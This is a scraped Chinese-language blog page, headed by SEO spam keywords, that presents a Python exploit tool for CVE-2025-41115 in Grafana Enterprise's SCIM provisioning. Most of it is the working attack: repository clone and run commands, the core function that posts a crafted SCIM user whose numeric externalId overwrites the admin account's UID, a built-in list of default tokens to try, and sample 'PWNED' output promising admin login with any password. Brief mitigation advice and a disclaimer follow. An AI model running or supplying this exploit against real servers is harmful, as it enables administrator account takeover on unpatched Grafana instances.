培训网站建设公司东莞松山湖网站建设
培训网站建设公司,东莞松山湖网站建设,搜狗短链接生成,哪个网站做电子请帖好Grafana Enterprise SCIM漏洞利用工具#xff08;CVE-2025-41115#xff09;
项目描述
这是一个用于演示和验证CVE-2025-41115漏洞的Python利用脚本。该漏洞是Grafana Enterprise中一个关键#xff08;CVSS 10.0#xff09;的安全漏洞#xff0c;影响其SCIM用户配置功能。…Grafana Enterprise SCIM漏洞利用工具CVE-2025-41115项目描述这是一个用于演示和验证CVE-2025-41115漏洞的Python利用脚本。该漏洞是Grafana Enterprise中一个关键CVSS 10.0的安全漏洞影响其SCIM用户配置功能。当攻击者能够向SCIM端点发送请求时可以通过数字externalId参数覆盖现有用户的内部UID从而实现权限提升和管理员账户接管。⚠️注意此工具仅供授权安全测试和教育用途。未经授权测试他人系统是非法行为。功能特性自动化漏洞检测自动尝试多个默认/泄露的SCIM令牌一键利用只需提供目标URL即可尝试攻击实时反馈清晰显示攻击结果和响应信息安全绕过自动禁用SSL证书验证警告多令牌支持内置多个可能有效的默认令牌时间戳防冲突使用时间戳生成唯一攻击者邮箱安装指南系统要求Python 3.xrequests库网络访问目标Grafana实例的权限安装步骤克隆仓库sudogitclone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.gitcdBlackash-CVE-2025-41115安装依赖pipinstallrequests设置执行权限可选chmodx CVE-2025-41115.py使用说明基础用法# 针对HTTP目标python3 CVE-2025-41115.py http://target.com:3000# 针对HTTPS目标python3 CVE-2025-41115.py https://grafana.company.com攻击流程脚本会尝试以下SCIM令牌用户自定义令牌需手动修改代码默认泄露令牌多个常见默认值如果攻击成功输出将显示使用的有效令牌部分创建的恶意账户凭据完整的API响应包含被覆盖的UID成功后可以使用创建的邮箱地址和任意密码登录为目标管理员。预期输出示例[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000 [*] Trying default/leaked tokens your token... [] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx... [] Login as: rooted1732212345pwn.lab (any password) → you are now Admin! [] Full response: { schemas: [ urn:ietf:params:scim:schemas:core:2.0:User ], id: 1, externalId: 1, userName: rooted1732212345pwn.lab, name: { formatted: Pwned User } }漏洞条件目标必须满足以下配置SCIM功能启用enableSCIM true用户同步启用[auth.scim] user_sync_enabled true核心代码主利用函数deftry_exploit(token):headers{Authorization:fBearer{token},Content-Type:application/scimjson}payload{schemas:[urn:ietf:params:scim:schemas:core:2.0:User],userName:ATTACKER,externalId:TARGET_UID,# 关键参数数字ID会被错误映射为内部UIDname:{formatted:Pwned User},emails:[{value:ATTACKER,primary:True}],active:True}try:rrequests.post(f{BASE}/api/scim/v2/Users,jsonpayload,headersheaders,verifyFalse,timeout10)ifr.status_codein(200,201):print(f[] PWNED with token →{token[:20]}...)print(f[] Login as:{ATTACKER}(any password) → you are now Admin!)print(f[] Full response:{json.dumps(r.json(),indent2)})returnTrueelifUnauthorizedinr.textorr.status_code401:returnFalseelse:print(f[?] Unexpected response{r.status_code}:{r.text})returnFalseexcept:returnFalse默认令牌列表# 内置的默认/泄露SCIM令牌列表DEFAULT_TOKENS[glsa_11111111111111111111111111111111_11111111111111111111111111111111,glsa_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,glsa_00000000000000000000000000000000_00000000000000000000000000000000,TOKEN# 用户自定义令牌]主执行逻辑if__name____main__:iflen(sys.argv)!2:print([!] Usage: python3 CVE-2025-41115.py http://target.com)sys.exit(1)BASEsys.argv[1].rstrip(/)print(f[*] CVE-2025-41115 → Targeting{BASE})print([*] Trying default/leaked tokens your token...)# 依次尝试所有令牌fortinDEFAULT_TOKENS:iftry_exploit(t.strip()):sys.exit(0)print([-] All tokens failed. You need a valid SCIM token (or the target is patched).)print( Get one from: Admin → Authentication → SCIM → Generate token)攻击者身份生成# 使用时间戳生成唯一的攻击者邮箱避免冲突ATTACKERfrooted{int(time.time())}pwn.labTARGET_UID1# 目标UID通常为管理员账户受影响版本版本状态12.0.0 - 12.2.1❌ 受影响12.3.0✅ 已修复12.2.1修复版✅ 已修复12.1.3✅ 已修复12.0.6✅ 已修复缓解措施立即升级更新到Grafana 12.3.0或已修复的维护版本检查配置如果不使用SCIM确保enableSCIM false或user_sync_enabled false审计日志监控意外的用户创建和权限变更信任边界仅允许可信的身份提供商访问SCIM端点免责声明本工具仅用于授权安全测试和教育目的。使用者需确保仅测试自己拥有或获得书面授权测试的系统遵守所有适用的法律和法规对使用此工具造成的任何后果承担全部责任建议所有Grafana Enterprise用户立即检查并应用相关安全补丁。FINISHED6HFtX5dABrKlqXeO5PUv/84SoIoTE3firf/5vX8AZ5ChaGK4dzijQQbdG477RY9更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享